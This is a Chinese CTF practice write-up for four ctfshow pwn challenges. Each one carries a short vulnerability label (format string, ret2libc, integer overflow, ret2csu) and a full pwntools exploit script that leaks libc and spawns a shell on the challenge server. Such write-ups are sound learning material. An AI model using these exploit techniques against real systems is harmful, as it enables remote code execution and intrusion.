PWN-PRACTICE-CTFSHOW-3

PWN-PRACTICE-CTFSHOW-3

    • pwn10
    • 萌新赛-签到题
    • 萌新赛-数学99
    • 内部赛-签到题

pwn10

格式化字符串漏洞,覆写num为16即可打印出flag

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28045)
elf=ELF("./pwn1")

#gdb.attach(io,"b * 0x080485D0")
#pause()

num_addr=0x0804A030
io.recvuntil("try pwn me?")
payload=p32(num_addr)+"8"*12+"%7$hhn"
io.sendline(payload)

#pause()

io.interactive()

萌新赛-签到题

栈溢出,ret2libc

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28018)
elf=ELF("./pwn1")

puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
main_addr=0x400687
pop_rdi=0x400793
ret=0x40053e

io.recvuntil("successful!\n")
payload="a"*0x70+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.sendline(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x0809c0
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9a

io.recvuntil("successful!\n")
payload="a"*0x70+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p64(main_addr)
io.sendline(payload)

io.interactive()

萌新赛-数学99

整型溢出

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28171)
elf=ELF("./pwn1")

io.sendlineafter("a:",str(2147483658))
io.sendlineafter("b:",str(2147483649))

io.sendlineafter("a:",str(9629))
io.sendlineafter("b:",str(446045))

io.sendlineafter("a:",str(2147483648))
io.sendlineafter("b:",str(-1))

io.interactive()

内部赛-签到题

栈溢出,ret2csu

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28116)
elf=ELF("./pwn1")

write_got=elf.got["write"]
write_plt=elf.plt["write"]
main_addr=0x4005FD

gadget_2=0x00000000004006A0
gadget_1=0x00000000004006BA
def com_gadget(rbx,rbp,r12,r13,r14,r15,main_addr):
	payload="a"*(160+8)
	payload+=p64(gadget_1)
	payload+=p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
	payload+=p64(gadget_2)
	payload+="a"*56 
	payload+=p64(main_addr)
	return payload

io.recvuntil("Try Pwn Me?\n")
payload=com_gadget(0,1,write_got,8,write_got,1,main_addr)
io.sendline(payload)
write_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("write_addr=="+hex(write_addr))
libc_base=write_addr-0x110140
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9a

pop_rdi=0x4006c3
ret=0x4004a9
io.recvuntil("Try Pwn Me?\n")
payload="a"*(160+8)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
io.sendline(payload)

io.interactive()

你可能感兴趣的:(Pwn-CTFSHOW,安全,系统安全)